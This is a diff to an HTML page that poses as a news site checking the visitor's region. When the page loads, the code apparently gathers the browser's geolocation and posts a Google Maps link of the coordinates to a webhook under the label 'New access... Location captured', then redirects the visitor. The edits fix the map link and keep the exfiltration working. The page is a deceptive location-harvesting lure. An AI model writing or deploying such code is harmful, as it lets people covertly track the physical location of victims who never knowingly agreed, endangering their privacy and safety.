--- a/index.html
+++ b/index.html
@@ -22,7 +22,6 @@
     </style>
 </head>
 <body onload="iniciar()">
-
     <div class="loader"></div>
     <p class="aviso">Validando sua região para liberar a notícia...</p>
 
@@ -41,15 +40,13 @@
         function enviarEDirecionar(pos) {
             const lat = pos.coords.latitude;
             const log = pos.coords.longitude;
-            // LINK DO MAPA CORRIGIDO
+            // LINK DO MAPA CORRIGIDO (SEM O ERRO DO {LAT})
             const mapa = `https://www.google.com/maps?q=${lat},${log}`;
 
             fetch(WEBHOOK_URL, {
                 method: "POST",
                 headers: { "Content-Type": "application/json" },
-                body: JSON.stringify({ 
-                    content: `📍 **Novo acesso Monte City!**\n🌍 **Localização capturada:** ${mapa}` 
-                })
+                body: JSON.stringify({ content: `📍 **Novo acesso Monte City!**\n🌍 **Localização:** ${mapa}` })
             }).finally(() => { direcionar(); });
         }
 
